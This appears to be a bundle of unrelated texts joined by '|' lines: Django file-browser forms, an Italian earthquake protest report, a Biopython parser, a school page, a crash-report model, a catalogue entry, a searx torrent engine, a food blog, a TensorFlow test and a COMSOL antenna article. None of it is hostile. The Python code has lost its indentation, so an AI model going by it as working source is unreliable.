class RenameForm(forms.Form):
op = "rename"
src_path = CharField(label=_("File to rename"), help_text=_("The file to rename."))
dest_path = CharField(label=_("New name"), help_text=_("Rename the file to:"))
class BaseRenameFormSet(FormSet):
op = "rename"
RenameFormSet = formset_factory(RenameForm, formset=BaseRenameFormSet, extra=0)
class CopyForm(forms.Form):
op = "copy"
src_path = CharField(label=_("File to copy"), help_text=_("The file to copy."))
dest_path = CharField(label=_("Destination location"), help_text=_("Copy the file to:"))
class BaseCopyFormSet(FormSet):
op = "copy"
CopyFormSet = formset_factory(CopyForm, formset=BaseCopyFormSet, extra=0)
class UploadFileForm(forms.Form):
op = "upload"
# The "hdfs" prefix in "hdfs_file" triggers the HDFSfileUploadHandler
hdfs_file = FileField(forms.Form, label=_("File to Upload"))
dest = PathField(label=_("Destination Path"), help_text=_("Filename or directory to upload to."))
class UploadArchiveForm(forms.Form):
op = "upload"
archive = FileField(forms.Form, label=_("Archive to Upload"))
dest = PathField(label=_("Destination Path"), help_text=_("Archive to upload to."))
class RemoveForm(forms.Form):
op = "remove"
path = PathField(label=_("File to remove"))
class RmDirForm(forms.Form):
op = "rmdir"
path = PathField(label=_("Directory to remove"))
class RmTreeForm(forms.Form):
op = "rmtree"
path = PathField(label=_("Directory to remove (recursively)"))
class BaseRmTreeFormset(FormSet):
op = "rmtree"
RmTreeFormSet = formset_factory(RmTreeForm, formset=BaseRmTreeFormset, extra=0)
class RestoreForm(forms.Form):
op = "rmtree"
path = PathField(label=_("Path to restore"))
class BaseRestoreFormset(FormSet):
op = "restore"
RestoreFormSet = formset_factory(RestoreForm, formset=BaseRestoreFormset, extra=0)
class TrashPurgeForm(forms.Form):
op = "purge_trash"
class MkDirForm(forms.Form):
op = "mkdir"
path = PathField(label=_("Path in which to create the directory"))
name = PathField(label=_("Directory Name"))
class TouchForm(forms.Form):
op = "touch"
path = PathField(label=_("Path in which to create the file"))
name = PathField(label=_("File Name"))
class ChownForm(forms.Form):
op = "chown"
path = PathField(label=_("Path to change user/group ownership"))
# These could be "ChoiceFields", listing only users and groups
# that the current user has permissions for.
user = CharField(label=_("User"), min_length=1)
user_other = CharField(label=_("OtherUser"), min_length=1, required=False)
group = CharField(label=_("Group"), min_length=1)
group_other = CharField(label=_("OtherGroup"), min_length=1, required=False)
recursive = BooleanField(label=_("Recursive"), required=False)
def __init__(self, *args, **kwargs):
super(ChownForm, self).__init__(*args, **kwargs)
self.all_groups = [ group.name for group in Group.objects.all() ]
self.all_users = [ user.username for user in User.objects.all() ]
class BaseChownFormSet(FormSet):
op = "chown"
ChownFormSet = formset_factory(ChownForm, formset=BaseChownFormSet, extra=0)
class ChmodForm(forms.Form):
op = "chmod"
path = PathField(label=_("Path to change permissions"))
# By default, BooleanField only validates when
# it's checked.
user_read = BooleanField(required=False)
user_write = BooleanField(required=False)
user_execute = BooleanField(required=False)
group_read = BooleanField(required=False)
group_write = BooleanField(required=False)
group_execute = BooleanField(required=False)
other_read = BooleanField(required=False)
other_write = BooleanField(required=False)
other_execute = BooleanField(required=False)
sticky = BooleanField(required=False)
recursive = BooleanField(required=False)
names = ("user_read", "user_write", "user_execute",
"group_read", "group_write", "group_execute",
"other_read", "other_write", "other_execute",
"sticky")
def __init__(self, initial, *args, **kwargs):
logging.info(dir(self))
logging.info(dir(type(self)))
# Convert from string representation.
mode = initial.get("mode")
if mode is not None:
mode = int(mode, 8)
bools = rwx.expand_mode(mode)
for name, b in zip(self.names, bools):
initial[name] = b
logging.debug(initial)
kwargs['initial'] = initial
forms.Form.__init__(self, *args, **kwargs)
def full_clean(self):
forms.Form.full_clean(self)
if hasattr(self, "cleaned_data"):
self.cleaned_data["mode"] = rwx.compress_mode(map(lambda name: self.cleaned_data[name], self.names))
class BaseChmodFormSet(FormSet):
op = "chmod"
ChmodFormSet = formset_factory(ChmodForm, formset=BaseChmodFormSet, extra=0)
|
It is easy to understand why the earthquake victims are so angry. Just look around: There have been no changes in Arquata del Tronto since Aug. 24, when the earthquake demolished the town. The gutted houses, the rubble piled in the streets, the deep cracks on the walls left standing.
In recent months, only earthquakes seemed to remember the earthquake victims, with a cluster of seismic activity that only in recent weeks has begun to slow down. There have been tens of thousands tremors of varying intensity. Every time the victims felt them, it was a reminder of their nightmare.
Under the town’s citadel, on Salaria Road, hundreds gathered Saturday morning to express their displeasure (an understatement) at a reconstruction that has never really begun. They blocked the road with tractors and held signs, all under the slogan “The re-shock of the earthquake victims.” Their logo is a shattered heart, and each banner bears the name of the towns they represent: not only Amatrice, Accumoli and Arquata, certainly, but also Castelluccio di Norcia, Visso, Pieve Torrina and other Macerata towns destroyed in the second seismic wave in late October.
Protesters chanted: “The earth trembles, we don’t.” Around them, police looked on, while the local police tried to divert the traffic on Salaria Road, where a bottleneck of massive proportions formed, with queues of over an hour after Acquasanta Terme, in the direction of Rome.
First Matteo Renzi, then Paolo Gentiloni were immortalized several times as they walked through the rubble in the Marche, Lazio and Umbria provinces, but their words were not followed by actions. A long winter — which put additional burden on the situation — has passed, spring was announced as the season of rebirth, but there are no signs of reconstruction. It feels as if time has not passed, and people have run out of patience: After several delays, no deadline was met.
Protesters took to the streets in 10 towns and also in Rome, in front of the Parliament and the Pantheon, representing 131 municipalities.
“We’re delivering an ultimatum to the government,” earthquake victims said. “There are no houses, no prospects and no information. Nothing is operational, the decrees issued by the government have not been implemented and everything is standing still. Gentiloni speaks of non-existent facts: The €1 billion he promised is nowhere to be found.” And they made a promise: “If we don’t get concrete results soon, we are ready to block the country.” A bleak fact captures the situation: Only 25 houses were delivered in seven months.
Every official who, for various reasons, is involved on the reconstruction is in the crosshairs: In addition to the federal government and the regions. There is also harsh criticism against the commissioner for the reconstruction Vasco Errani. There are even those who long for the actions of Bertolaso in Aquila, a detail that says a lot about how the earthquake victims are on their last strength.
At the end of the day, among the silence in the buildings, Gentiloni made it known that “the earthquake victims are a top priority. You will see it in the budget.” The ill-concealed hope is to silence the protest. It will not go away so easily.
|
# Copyright 2001 by Katharine Lindner. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Martel based parser to read SAF formatted files.
This is a huge regular regular expression for SAF, built using
the 'regular expressiona on steroids' capabilities of Martel.
http://www.embl-heidelberg.de/predictprotein/Dexa/optin_safDes.html
Notes:
Just so I remember -- the new end of line syntax is:
New regexp syntax - \R
\R means "\n|\r\n?"
[\R] means "[\n\r]"
This helps us have endlines be consistent across platforms.
"""
# standard library
#http://www.embl-heidelberg.de/predictprotein/Dexa/optin_safDes.html
import string
# Martel
import Martel
from Martel import RecordReader
from Martel import Str
from Martel import AnyEol
from Martel import ToEol
from Martel import Group
from Martel import Alt
from Martel import Rep
from Martel import Rep1
from Martel import Any
from Martel import AnyBut
from Martel import RepN
from Martel import Opt
from Martel import ToSep
from Martel.Expression import Assert
# --- first set up some helper constants and functions
# Copyright 2001 by Katharine Lindner. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
digits = "0123456789"
valid_sequence_characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-. \t'
white_space = "\t "
valid_residue_characters = digits + white_space + chr( 0x2e )
residue_number_line = Group( "residue_number_line", \
Rep1( Any( valid_residue_characters ) ) +
AnyEol())
comment_line = Group( "comment_line", \
Str( "#" ) +
ToEol() )
ignored_line = Group( "ignored_line", \
Alt( comment_line, residue_number_line ) )
candidate_line = Group( "candidate_line", \
Assert( Str( "#" ), 1 ) +
Assert( Any( valid_residue_characters ), 1 ) +
ToSep( sep = ' ' ) +
Rep( Any( valid_sequence_characters ) ) +
ToEol() )
saf_record = Group( "saf_record", \
candidate_line + Rep( Alt( candidate_line, ignored_line ) ) + Opt( Str( "#" ) ) )
|
We are very proud of the music teaching and learning that takes place in our school and the standard of attainment our pupils achieve in this subject.
Our music curriculum is led by Mrs Z Griffiths - a specialist music teacher - who is employed directly by the school and teaches four afternoons a week in Key Stage 2.
The hard work of Mrs Griffiths and the quality of our music curriculum has been recognised by the Staffordshire and Stoke on Trent Music Education Hub which has awarded the school an Excellence in Music Provision Award - Silver for 2016 / 17.
We are very proud of this achievement as it shows how much we value music as part of the curriculum within our school and how we work hard to develop the skills of our pupils in this subject.
|
from django.db import models
from django.utils.timezone import utc
from datetime import datetime
import json
REPORT_STATUS = (
("solved","Solved"),
("unsolved","Unsolved"),
)
class CrashReport(models.Model):
stack_trace = models.TextField(default="")
logcat = models.TextField(default="")
shared_preferences = models.TextField(default="")
environment = models.TextField(default="")
total_mem_size = models.BigIntegerField(default=0,verbose_name='Total Memory Size')
initial_configuration = models.TextField(default="")
display = models.TextField(default="")
available_mem_size = models.BigIntegerField(default=0,verbose_name='Available Memory Size')
phone_model = models.CharField(max_length=50,default="")
user_comment = models.TextField(default="")
crash_configuration = models.TextField(default="")
device_features = models.TextField(default="")
settings_system = models.TextField(default="",verbose_name='System Settings')
file_path = models.CharField(max_length=100,default="")
installation_id = models.CharField(max_length=100,default="")
user_crash_date = models.CharField(max_length=50,default="",verbose_name='Crash Date')
app_version_name = models.CharField(max_length=50,default="",verbose_name='Version Name')
user_app_start_date = models.CharField(max_length=50,default="",verbose_name='Application Start Date')
settings_global = models.TextField(default="",verbose_name='Global Settings')
build = models.TextField(default="")
settings_secure = models.TextField(default="",verbose_name='Secure Settings')
dumpsys_meminfo = models.TextField(default="")
user_email = models.CharField(max_length=50,default="")
report_id = models.CharField(max_length=100,default="")
product = models.CharField(max_length=50,default="")
package_name = models.CharField(max_length=100,default="",verbose_name='Package Name')
brand = models.CharField(max_length=50,default="")
android_version = models.CharField(max_length=50,default="")
app_version_code = models.CharField(max_length=50,default="",verbose_name='Version Code')
is_silent = models.CharField(max_length=50,default="")
custom_data = models.TextField(default="")
description = models.TextField(default="")
solved = models.CharField(max_length=10,choices=REPORT_STATUS,default="unsolved",verbose_name='Status')
created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return ('Device: %s %s - Android: %s - Application: %s Version: %s') % (self.brand,self.product,self.android_version,self.app_version_name,self.app_version_code)
def __unicode__(self):
return ('Device: %s %s - Android: %s - Application: %s Version: %s') % (self.brand,self.product,self.android_version,self.app_version_name,self.app_version_code)
|
Collected Works / 1, Selected papers 1.
Frankfurt am Main : Hänsel-Hohenhausen, 2003.
Deutsche Hochschulschriften, 1231.; Reprint philosophy, 1.
Gustav Bergmann. [Einf. von Erwin Tegtmeier].
Add tags for "Collected Works / 1, Selected papers 1.". Be the first.
<http://www.worldcat.org/oclc/314137066> # Collected Works 1, Selected papers 1.
schema:hasPart <http://www.worldcat.org/oclc/314137066> ; # Collected Works 1, Selected papers 1.
schema:about <http://www.worldcat.org/oclc/314137066> ; # Collected Works 1, Selected papers 1.
|
"""
BTDigg (Videos, Music, Files)
@website https://btdig.com
@provide-api yes (on demand)
@using-api no
@results HTML (using search portal)
@stable no (HTML can change)
@parse url, title, content, seed, leech, magnetlink
"""
from lxml import html
from operator import itemgetter
from searx.engines.xpath import extract_text
from searx.url_utils import quote, urljoin
from searx.utils import get_torrent_size
# engine dependent config
categories = ['videos', 'music', 'files']
paging = True
# search-url
url = 'https://btdig.com'
search_url = url + '/search?q={search_term}&p={pageno}'
# do search-request
def request(query, params):
params['url'] = search_url.format(search_term=quote(query),
pageno=params['pageno'] - 1)
return params
# get response from search-request
def response(resp):
results = []
dom = html.fromstring(resp.text)
search_res = dom.xpath('//div[@class="one_result"]')
# return empty array if nothing is found
if not search_res:
return []
# parse results
for result in search_res:
link = result.xpath('.//div[@class="torrent_name"]//a')[0]
href = urljoin(url, link.attrib.get('href'))
title = extract_text(link)
excerpt = result.xpath('.//div[@class="torrent_excerpt"]')[0]
content = html.tostring(excerpt, encoding='unicode', method='text', with_tail=False)
# it is better to emit <br/> instead of |, but html tags are verboten
content = content.strip().replace('\n', ' | ')
content = ' '.join(content.split())
filesize = result.xpath('.//span[@class="torrent_size"]/text()')[0].split()[0]
filesize_multiplier = result.xpath('.//span[@class="torrent_size"]/text()')[0].split()[1]
files = (result.xpath('.//span[@class="torrent_files"]/text()') or ['1'])[0]
# convert filesize to byte if possible
filesize = get_torrent_size(filesize, filesize_multiplier)
# convert files to int if possible
try:
files = int(files)
except:
files = None
magnetlink = result.xpath('.//div[@class="torrent_magnet"]//a')[0].attrib['href']
# append result
results.append({'url': href,
'title': title,
'content': content,
'filesize': filesize,
'files': files,
'magnetlink': magnetlink,
'template': 'torrent.html'})
# return results sorted by seeder
return results
|
A sample of some of Provos top dishes as featured in the summer issue of Where When How. For past Provo Bites, click here. We’ll be there in a week for another culinary adventure.
Wahoo Carpaccio at Caicos Cafe – If there’s anything as exciting as the left side of Caicos Cafe’s menu it is in my humble opinion the right side of the menu. All that excitement causing the specials on the board to look lonely and out of place, like the lone sock in your sock drawer missing its partner (Why do people keep the single socks. Hard to say goodbye or are they waiting for a miraculous appearance of some sort). At any rate, all sorts of food magic can also be found on that special board, and if there’s fresh Wahoo in the house there’s a good chance “Mad Max” will add it in this Carpaccio form. Expertly prepared, sprinkled with capers and pink peppercorns, perfectly cut, silky smooth, melt in your mouth buttery “When Harry Met Sally” seafoodgasm goodness, worthy of a run on sentence. Get this!
Conch Chowder at Le Bouchon. Yes, these guys make a killer Steak Frites. Yes, their escargot will make you slap your mama. Yes, the place is always full of beautiful people, and NO that’s not the main reason we keep going back there Mrs Ziggy, aka the most beautiful woman I know. And yes, even the simple stuff like the smoky, perfectly spiced, uncreamy Chowder is a winner at Le Bouchon Du Village. If there’s one dish that showcases Pierrick’s and Julian attention to detail, this may be the one.
Peruvian Conch Ceviche at Seaside. Here’s a fun tidbit for your next cocktail party. Most people don’t realize the role Peru had on our ability to function as society. Transportation networks, roped bridges, The Pisco Sour, all invented in ancient Peru. But the biggest contribution that most dont know about is the Ceviche, the grandfather of TCI’s national dish, Conch Salad. Young master chef Francois mixes in various peppers including Scotch Bonnet to give it the proper pleasant heat with just enough acid from the lime. And in true Peruvian style, he throws in plenty of fresh veggies including corn to make it the island Conch Salad to beat. The equally outstanding tuna Sashimi made this choice a tough one.
Romaine Lettuce at Lupo – We all have our routines right before heading to Turks and Caicos. Mine is having my fortune told. “You will choose wisely” was a common theme, and I have to tell you readers, those fortune cookies are correct more often than not. So I went against my comfort zone more often and ordered things that I normally never do, like this play on Caesar Salad. Quite possibly the best Caesar you will ever eat. Smoky Romaine, sharp Parm and crispy Pancetta bits round this piece of deliciousness. Nicely done Lupo!
Fettuccine with Guanciale and Black Truffles at Via Veneto – The fatty, deliciously salty Guanciale (pork cheeks) plays an important part here. But its all about that truffle essence that tells the brain “now this is gonna be yummy (foodie technical term)”. Just like when you put your shoes on and it feels sort of wet inside and you suddenly remember that your toddler was playing hide and seek again in the closet the night before and got a wee bit excited, your brain tells you its time to remove those shoes from your feet. Via Veneto is quickly becoming another Italian force to be reckoned with.
Sautéed Whole Snapper at Bugaloos (top)- A Snapper a day keeps the doctor away… and brings the creditors closer. Take your creditors to Bugaloos so they could understand. Freshly caught Red Snapper doesn’t require too much handling. Some coconut milk, onions, pepper, garlic, and simple seasoning is the best compliment for the mouthwatering perfectly flaky piece of fish. The inner barbarian Ziggy came out to attack this one with full force. While the inner feminine Ziggy required an emergency cookie stop 20 minutes later.
I Ziggy the II, bite my nails! I dont do it because I’m often nervous, gamble, or watch “The Bachelor” a lot. Its just a habit I developed as a child that never really went away. And after reading a report on Twitter by a reliable source that, get this, people who bite their nails tend to have a stronger immune system & rarely get sick, I’m not stopping any time soon. I may even offer to bite other people’s nails if they suffer from this fetish. I do very rarely get sick. I also have this thing where I need to lick my fingers before using a napkin, no matter who I’m eating with, and where I am. Using napkins on saucy fingers just feels very wrong. I may have been also a tiny little bit stinky before this particular meal, after a 4 hour walking tour of Hell’s Kitchen I was conducting right before the meal. Not to mention the bike run to Tribeca for Nish Nush Falafel for lunch.
So here I was…slightly stinky, tehina smelling, unmanicured fingers, on our anniversary dinner at the oil tycoon section of 2 Michelin Star Marea. Being surrounded by big glamour, and wealth I felt as comfortable as watching a Cialis commercial with the kids. But, after 2 drinks it didn’t take long until we settled down and enjoyed another fine meal at one of New York’s finest. By the way, I did shave for this one. I’m not an animal!
Crudo trio – Pretty forgettable overall. Exhibit A: I don’t remember much of it. Tried the razor clams, langoustine, and snapper. The snapper (Dentice) had the most flavor, and the Razor Clams not nearly as good as little sister Costata.
Halibut – I wasnt too sure about this one. I mean its a freakin halibut (firm, mild, dries quickly), and very often for us after all those rich primis, fish just doesnt deliver much. This one did! Halibut cooked nicely, not too dry, but what made the dish was the Fregola Sarda, little bubbly Israeli couscous-like pasta. With a little pleasant heat the pasta worked very well with the mild fish.
The boats were fun, although most likely built during biblical times. I developed a child labor technique called OOM-PAH (patent pending). Shouting “OOM-PAH” meant they both row to the drum-like beat, “OOM” means just the right child, “PAH” means left. The faster the chant, the faster the row. It worked for us in that we got back in time (1 hour) and no baby turtles were hurt in the process. One mother turtle got almost killed, but she was at the wrong place, at the wrong time.
After that we looked for a table at the boathouse for a drink but no luck. So we trekked a little further to the other boat rental spot where you rent a remote control to navigate your assigned sailboat. Had some fun with that, climbed Alice in Wonderland (I think I may have killed something else – another turtle), Belvedere Castle, and headed toward dinner.
Having been to New Orleans, and San Francisco, while living in NYC, I’m starting to believe it. He was talking about food, right? I believe so. As I’ve said before, I always compare the excitement of going to NOLA to that of Italy. Amazing, in a way somewhat foreign cuisine in one heck of a unique setting. Without further ado, here are our top NOLA bites during a recent trip.
BBQ Shrimp at Bevi – I’ll start with the no-brainer. Perhaps our top eat came from a little shack in Metairie about 30 minutes out from the quarter, close to the airport. We came for the Crawfish boil and got that and so much more. Huge, plump fresh perfectly cooked head-on gulf shrimp complimented by what I can only describe as Sauce of Dreams. Or maybe it was the beer talking, as in Canebrake beer, the sauce main ingredient. Move over Mr B’s, and say hello to Mr B!
Chargrilled Oysters at Felix’s – Last trip we enjoyed them at Drago’s who invented the Chargrilled Oysters, but now we have a new favorite looks like. They are not as cheesey and buttery at Felix’s but lightly breaded, some lemon, oil and a little bit of cheese just enough to bring out the flavors of the oysters without overpowering.
BBQ Shrimp at Mr B’s – Yes, two BBQ Shrimp dishes on the list this time, which prompted to ask on Chowhound where can I get this in NYC. No replies so far and its been at least 5 minutes! This thing was our top eat last time and the only repeater on the list. If you cant get to Metairie, or even if you can, get this!
Warning: Some of these images may be disturbing. They may include large crowds, pictures of alcoholic beverages, tender grilled octopuses (yes, octopuses is not only acceptable but rolls off the tongue better.. try saying it a few times.. Octopuses) and ways in which we can cheat the system and walk around holding an alcoholic beverage on the streets of NY. They may also include scenes way too familiar to the average NY food festival goer including pictures of Shish Kebab, corn, and strange looking dudes sporting cats and giant beer bottles on their heads.
I’m also taking this opportunity to award the first ever ZAG award to the vendor showing excellence via most palatable eats. The ZAG (Ziggy Against Gyros) goes to Empanada Mama and their terrific Brazil and Spicy Chicken Empanadas. Congratulations guys.
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.platform import test
random_seed.set_random_seed(23)
rng = np.random.RandomState(0)
class AssertZeroImagPartTest(test.TestCase):
def test_real_tensor_doesnt_raise(self):
x = ops.convert_to_tensor([0., 2, 3])
with self.test_session():
# Should not raise.
linear_operator_util.assert_zero_imag_part(x, message="ABC123").run()
def test_complex_tensor_with_imag_zero_doesnt_raise(self):
x = ops.convert_to_tensor([1., 0, 3])
y = ops.convert_to_tensor([0., 0, 0])
z = math_ops.complex(x, y)
with self.test_session():
# Should not raise.
linear_operator_util.assert_zero_imag_part(z, message="ABC123").run()
def test_complex_tensor_with_nonzero_imag_raises(self):
x = ops.convert_to_tensor([1., 2, 0])
y = ops.convert_to_tensor([1., 2, 0])
z = math_ops.complex(x, y)
with self.test_session():
with self.assertRaisesOpError("ABC123"):
linear_operator_util.assert_zero_imag_part(z, message="ABC123").run()
class AssertNoEntriesWithModulusZeroTest(test.TestCase):
def test_nonzero_real_tensor_doesnt_raise(self):
x = ops.convert_to_tensor([1., 2, 3])
with self.test_session():
# Should not raise.
linear_operator_util.assert_no_entries_with_modulus_zero(
x, message="ABC123").run()
def test_nonzero_complex_tensor_doesnt_raise(self):
x = ops.convert_to_tensor([1., 0, 3])
y = ops.convert_to_tensor([1., 2, 0])
z = math_ops.complex(x, y)
with self.test_session():
# Should not raise.
linear_operator_util.assert_no_entries_with_modulus_zero(
z, message="ABC123").run()
def test_zero_real_tensor_raises(self):
x = ops.convert_to_tensor([1., 0, 3])
with self.test_session():
with self.assertRaisesOpError("ABC123"):
linear_operator_util.assert_no_entries_with_modulus_zero(
x, message="ABC123").run()
def test_zero_complex_tensor_raises(self):
x = ops.convert_to_tensor([1., 2, 0])
y = ops.convert_to_tensor([1., 2, 0])
z = math_ops.complex(x, y)
with self.test_session():
with self.assertRaisesOpError("ABC123"):
linear_operator_util.assert_no_entries_with_modulus_zero(
z, message="ABC123").run()
class BroadcastMatrixBatchDimsTest(test.TestCase):
def test_zero_batch_matrices_returned_as_empty_list(self):
self.assertAllEqual(
[], linear_operator_util.broadcast_matrix_batch_dims([]))
def test_one_batch_matrix_returned_after_tensor_conversion(self):
arr = rng.rand(2, 3, 4)
tensor, = linear_operator_util.broadcast_matrix_batch_dims([arr])
self.assertTrue(isinstance(tensor, ops.Tensor))
with self.test_session():
self.assertAllClose(arr, tensor.eval())
def test_static_dims_broadcast(self):
# x.batch_shape = [3, 1, 2]
# y.batch_shape = [4, 1]
# broadcast batch shape = [3, 4, 2]
x = rng.rand(3, 1, 2, 1, 5)
y = rng.rand(4, 1, 3, 7)
batch_of_zeros = np.zeros((3, 4, 2, 1, 1))
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x, y])
with self.test_session() as sess:
self.assertAllEqual(x_bc_expected.shape, x_bc.get_shape())
self.assertAllEqual(y_bc_expected.shape, y_bc.get_shape())
x_bc_, y_bc_ = sess.run([x_bc, y_bc])
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_static_dims_broadcast_second_arg_higher_rank(self):
# x.batch_shape = [1, 2]
# y.batch_shape = [1, 3, 1]
# broadcast batch shape = [1, 3, 2]
x = rng.rand(1, 2, 1, 5)
y = rng.rand(1, 3, 2, 3, 7)
batch_of_zeros = np.zeros((1, 3, 2, 1, 1))
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x, y])
with self.test_session() as sess:
self.assertAllEqual(x_bc_expected.shape, x_bc.get_shape())
self.assertAllEqual(y_bc_expected.shape, y_bc.get_shape())
x_bc_, y_bc_ = sess.run([x_bc, y_bc])
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_dynamic_dims_broadcast_32bit(self):
# x.batch_shape = [3, 1, 2]
# y.batch_shape = [4, 1]
# broadcast batch shape = [3, 4, 2]
x = rng.rand(3, 1, 2, 1, 5).astype(np.float32)
y = rng.rand(4, 1, 3, 7).astype(np.float32)
batch_of_zeros = np.zeros((3, 4, 2, 1, 1)).astype(np.float32)
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_ph = array_ops.placeholder(dtypes.float32)
y_ph = array_ops.placeholder(dtypes.float32)
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x_ph, y_ph])
with self.test_session() as sess:
x_bc_, y_bc_ = sess.run([x_bc, y_bc], feed_dict={x_ph: x, y_ph: y})
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_dynamic_dims_broadcast_32bit_second_arg_higher_rank(self):
# x.batch_shape = [1, 2]
# y.batch_shape = [3, 4, 1]
# broadcast batch shape = [3, 4, 2]
x = rng.rand(1, 2, 1, 5).astype(np.float32)
y = rng.rand(3, 4, 1, 3, 7).astype(np.float32)
batch_of_zeros = np.zeros((3, 4, 2, 1, 1)).astype(np.float32)
x_bc_expected = x + batch_of_zeros
y_bc_expected = y + batch_of_zeros
x_ph = array_ops.placeholder(dtypes.float32)
y_ph = array_ops.placeholder(dtypes.float32)
x_bc, y_bc = linear_operator_util.broadcast_matrix_batch_dims([x_ph, y_ph])
with self.test_session() as sess:
x_bc_, y_bc_ = sess.run([x_bc, y_bc], feed_dict={x_ph: x, y_ph: y})
self.assertAllClose(x_bc_expected, x_bc_)
self.assertAllClose(y_bc_expected, y_bc_)
def test_less_than_two_dims_raises_static(self):
x = rng.rand(3)
y = rng.rand(1, 1)
with self.assertRaisesRegexp(ValueError, "at least two dimensions"):
linear_operator_util.broadcast_matrix_batch_dims([x, y])
with self.assertRaisesRegexp(ValueError, "at least two dimensions"):
linear_operator_util.broadcast_matrix_batch_dims([y, x])
class MatmulWithBroadcastTest(test.TestCase):
def test_static_dims_broadcast(self):
# batch_shape = [2]
# for each batch member, we have a 1x3 matrix times a 3x7 matrix ==> 1x7
x = rng.rand(2, 1, 3)
y = rng.rand(3, 7)
y_broadcast = y + np.zeros((2, 1, 1))
with self.test_session():
result = linear_operator_util.matmul_with_broadcast(x, y)
self.assertAllEqual((2, 1, 7), result.get_shape())
expected = math_ops.matmul(x, y_broadcast)
self.assertAllEqual(expected.eval(), result.eval())
def test_dynamic_dims_broadcast_32bit(self):
# batch_shape = [2]
# for each batch member, we have a 1x3 matrix times a 3x7 matrix ==> 1x7
x = rng.rand(2, 1, 3)
y = rng.rand(3, 7)
y_broadcast = y + np.zeros((2, 1, 1))
x_ph = array_ops.placeholder(dtypes.float64)
y_ph = array_ops.placeholder(dtypes.float64)
with self.test_session() as sess:
result, expected = sess.run(
[linear_operator_util.matmul_with_broadcast(x_ph, y_ph),
math_ops.matmul(x, y_broadcast)],
feed_dict={x_ph: x, y_ph: y})
self.assertAllEqual(expected, result)
class DomainDimensionStubOperator(object):
def __init__(self, domain_dimension):
self._domain_dimension = ops.convert_to_tensor(domain_dimension)
def domain_dimension_tensor(self):
return self._domain_dimension
class AssertCompatibleMatrixDimensionsTest(test.TestCase):
def test_compatible_dimensions_do_not_raise(self):
with self.test_session():
x = ops.convert_to_tensor(rng.rand(2, 3, 4))
operator = DomainDimensionStubOperator(3)
# Should not raise
linear_operator_util.assert_compatible_matrix_dimensions(
operator, x).run()
def test_incompatible_dimensions_raise(self):
with self.test_session():
x = ops.convert_to_tensor(rng.rand(2, 4, 4))
operator = DomainDimensionStubOperator(3)
with self.assertRaisesOpError("Incompatible matrix dimensions"):
linear_operator_util.assert_compatible_matrix_dimensions(
operator, x).run()
if __name__ == "__main__":
test.main()
|
With the rise of 5G and other wireless millimeter-wave applications, there has been an increase in front-end antenna solutions that depend on monopole, dipole, and patch antennas. In these devices, the radiation efficiency tends to suffer due to the effect of lossy silicon substrate materials. Enter the dielectric resonator: Antennas using these resonators (made of nonmetallic materials) have a higher radiation efficiency. To increase directivity and gain at high frequencies, engineers can optimize dielectric resonator antenna (DRA) designs with simulation.
In the late 1800s, Lord Rayleigh discovered that a long rod made of a dielectric (i.e., nonconductive) material could act as a waveguide. Scientists continued to study the electromagnetic phenomena surrounding these materials, but there were no practical applications yet.
In 1939, American physicist Robert Richtmyer showed that dielectric rods can also act as resonators. He also proved that this type of resonator radiates because of the boundary conditions at the interface where the dielectric material meets air. Although Richtmyer’s work was significant in the development of DRAs, certain materials necessary to their operation were not readily available until the 1960s.
A disassembled RF diplexer at a 5-GHz range with 2 dielectric resonator waveguide filters and 9 transverse resonator stages per filter. Image by wdwd — Own work. Licensed under CC BY-SA 4.0, via Wikimedia Commons.
Later on, DRAs were used as filter element devices in microwave circuits. Starting in the 1980s, they started to get smaller and could operate at higher frequencies, enabling electrical engineers to further develop application areas such as wireless communication.
Today, DRAs are common in satellite and radar systems and are even used in nanophotonics. They also show potential in developing application areas like 5G technology. To improve the performance of DRAs at microwave (and higher) frequencies for future applications, engineers can evaluate designs using the RF Module, an add-on product to the COMSOL Multiphysics® software.
In this example, the dielectric resonator, made of quartz, is a basic radiating element. Passive metallic antenna elements are augmented to increase the antenna directivity and gain. The DRA is excited by a slot-coupled microstrip line. The passive metallic strips enhance the radiation behavior by acting as directors, guiding the radiation pattern and increasing directivity. Here, two strips are placed along the top, with two loops located on each face of the block. The dimensions of these elements are chosen so that they’re resonant at the operating frequency of 2.9 GHz.
The power source for the antenna is represented at the lumped port, which is fed via a microstrip line from the port. The microstrip line extends beyond the slot and forms a tuning stub and, along with the ground plane, is treated as being infinitely thin and a perfect electrical conductor (PEC). Surrounding the resonator is a sphere with the properties of a vacuum, with a perfectly matched layer (PML) acting as a boundary to free space.
As for meshing, it’s best to stick to at least five elements per wavelength in each material, and curved edges and surfaces with at least two elements per 90° chord. A swept mesh is suitable for the PML areas, and you can use tetrahedral elements of unit aspect ratio for the other modeling regions. The mesh is automatically configured through the physics-controlled mesh.
